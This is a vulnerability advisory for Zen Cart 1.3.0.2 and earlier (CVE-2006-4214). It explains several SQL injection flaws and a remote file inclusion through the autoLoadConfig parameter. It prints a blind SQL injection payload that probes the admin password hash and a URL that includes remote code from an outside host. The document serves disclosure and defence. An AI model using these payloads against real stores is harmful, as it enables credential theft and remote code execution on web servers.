Zen Cart Multiple Vulnerabilities
Vendor: Zen Cart
Product: Zen Cart
Version: <= 1.3.0.2
Website: http://www.zen-cart.com/
BID: 19542
CVE: CVE-2006-4214
OSVDB: 28144 28145 28146 28147 28148 28149
SECUNIA: 21484
Description:
Zen Cart is a descendant of the popular osCommerce project, and like osCommerce Zen Cart is one of the most popular open source ecommerce systems in the world. Unfortunately Zen Cart is vulnerable to quite a number of different attacks, and in some circumstances may allow an attacker to execute arbitrary code on the underlying web server with the rights of the httpd process. In addition to remote code execution several different SQL Injection attacks may be possible. The Zen Cart developers have commited fixes for these issues to CVS and an updated version of Zen Cart will be released soon to address the issues. All users should upgrade their Zen Cart installation as soon as possible.


SQL injection:
There are a number of SQL Injection issues in Zen Cart that allows for an attacker to access and modify data that is stored in the underlying database. The first of these issues occurs when sending a malformed post request to ipn_main_handler.php script. The root of the problem is that some unsanitized GPC data is sent directly to the ipn_get_stored_session function where it is then used in a query. Also, since all of $_SESSION is recreated from the results of this query it is also possible to do stuff like include arbitrary files by union selecting attacker supplied data to overwrite certain elements of the $_SESSION array. Another vulnerable function within Zen Cart is the whos_online_session_recreate function. An attacker could use this issue to send arbitrary sql data to an update statement and in newer mysql versions possibly subselect data. The issue that I just described can be triggered by sending a request to the login page with a malformed session id within the cookie. Once the attacker successfully logs in the old session id taken from the cookie will then be passed to the vulnerable function thus allowing for an attacker to inject arbitrary sql data. An attacker can also perform SQL Injection attacks by specifying sql data in the quantity field while updating their shopping cart, once logged in. The vulnerability here lies specifically in the add_cart function. In regards to the shopping cart it is also possible to perform SQL Injection attacks when adding items with malformed attributes (specifically the id[] parameter) and also when entering a malformed redemption code when checking out.

-99' UNION SELECT IF(MID(admin_pass,1,1)='2',1,0),2 FROM admin WHERE 1/*

Above is an example of data that could be sent via the id[] parameter when adding items to the shopping cart. If the first character of the admin password hash is 2 then an sql error will NOT be shown.


Remote File Inclusion:
Zen Cart suffers from a few file inclusion vulnerabilities that may lead to the execution of arbitrary code. Fortunately most of these issues are only exploitable locally due to the difficulty of getting null bytes through Zen Carts sanitization functions. For example, an attacker is able to include arbitrary local files by specifying an arbitrary path to the "typefilter" parameter as traversal sequences are never filtered out. However, below is a much more dangerous instance of remote file inclusion in Zen Cart.

/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell

The above example is possible due to an uninitialized array being passed to autoload_func.php The issue as shown above does require register globals to be on, and allows for remote code execution when register globals are turned on.


Solution:
The Zen Cart developers have commited fixes for these issues to CVS and an updated version of Zen Cart will be released soon to address the issues. All users should upgrade their Zen Cart installation as soon as possible.


Credits:
James Bercegay of the GulfTech Security Research Team